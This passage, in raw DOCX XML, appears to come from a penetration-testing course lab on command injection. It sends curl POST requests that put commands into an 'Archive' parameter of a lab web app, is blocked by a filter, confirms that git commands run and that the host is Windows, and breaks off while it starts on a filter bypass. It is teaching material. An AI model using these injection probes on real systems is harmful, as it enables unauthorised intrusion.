                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 23: Modified Web Content and new Input Textbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 23 shows an updated version of the application. In this version, we're able to clone git repositories by entering the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command combined with a URL. The example shows us the same command we would use in the command line. We can hypothesize that maybe the operating system will execute this string and, therefore, we may be able to inject our own commands. Let's try to use the form to clone the</w:t>
      </w:r>
      <w:hyperlink r:id="rId303">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId304">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ExploitDB</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> repository.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1752600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 24: Clone command for the ExploitDB repository" id="394" name="image384.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 24: Clone command for the ExploitDB repository" id="0" name="image384.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId305"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1752600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 24: Clone command for the ExploitDB repository</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After we click on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">submit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the cloning process of the ExploitDB repository starts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1066800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 25: Successfully cloned the ExploitDB Repository via the Web Application" id="422" name="image417.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 25: Successfully cloned the ExploitDB Repository via the Web Application" id="0" name="image417.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId306"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1066800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 25: Successfully cloned the ExploitDB Repository via the Web Application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output shows that the repository was successfully cloned.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloning the repository will result in an error within the lab environment. However, to follow along the walkthrough we can just skip this step.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DFA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, the actual command is displayed in the web application's output. Let's try to inject arbitrary commands such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ipconfig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We'll switch over to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP history</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Burp to understand the correct structure for the POST request. The request indicates the "Archive" parameter is used for the command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1536700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 26: Archive Parameter in the POST request" id="429" name="image439.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 26: Archive Parameter in the POST request" id="0" name="image439.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId307"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1536700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 26: Archive Parameter in the POST request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DFC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The figure shows that the "Archive" parameter contains the Git command. This means we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to provide our own commands to the parameter. We'll do this by using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-X</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to change the request type to POST. We'll also use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to specify what data is sent in the POST request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archive</w:t>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t xml:space="preserve">Command Injection detected. Aborting...%!(EXTRA string=ipconfig)      </w:t>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 40 - Detected Command Injection for ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E02">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On our first try, the web application shows that it detected a command injection attempt with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ipconfig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. Let's attempt to backtrack from the working input and find a bypass for the filter. Next, we'll try to only provide the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command for the Archive parameter in the POST request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl -X POST --data 'Archive=git' http://192.168.50.189:8000/archive</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An error occured with execution: exit status 1 and usage: git [--version] [--help] [-C &lt;path&gt;] [-c &lt;name&gt;=&lt;value&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">           [--exec-path[=&lt;path&gt;]] [--html-path] [--man-path] [--info-path]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E07">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">           [-p | --paginate | -P | --no-pager] [--no-replace-objects] [--bare]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   push      Update remote refs along with associated objects</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'git help -a' and 'git help -g' list available subcommands and some</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">concept guides. See 'git help &lt;command&gt;' or 'git help &lt;concept&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to read about a specific subcommand or concept.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See 'git help git' for an overview of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E10">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 41 - Entering git as command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E11">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output shows the help page for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command, confirming that we are not restricted to only using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Since we know that only providing "git" works for execution, we can try to add the</w:t>
      </w:r>
      <w:hyperlink r:id="rId308">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId309">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">version</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> subcommand. If this is executed, we'll establish that we can specify any </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command and achieve code execution. This will also reveal if the web application is running on Windows or Linux, since the output of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git version</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> includes the "Windows" string in</w:t>
      </w:r>
      <w:hyperlink r:id="rId310">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId311">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Git for Windows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If the web application is running on Linux, it will only show the version for Git.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl -X POST --data 'Archive=git version' http://192.168.50.189:8000/archive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Repository successfully cloned with command: git version and output: git version 2.35.1.windows.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 41 - Using git version to detect the operating system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E18">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output shows that the web application is running on Windows. Now we can use trial-and-error to poke around the filter and review what's allowed. Since we established that we cannot simply specify another command, let's try to combine the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
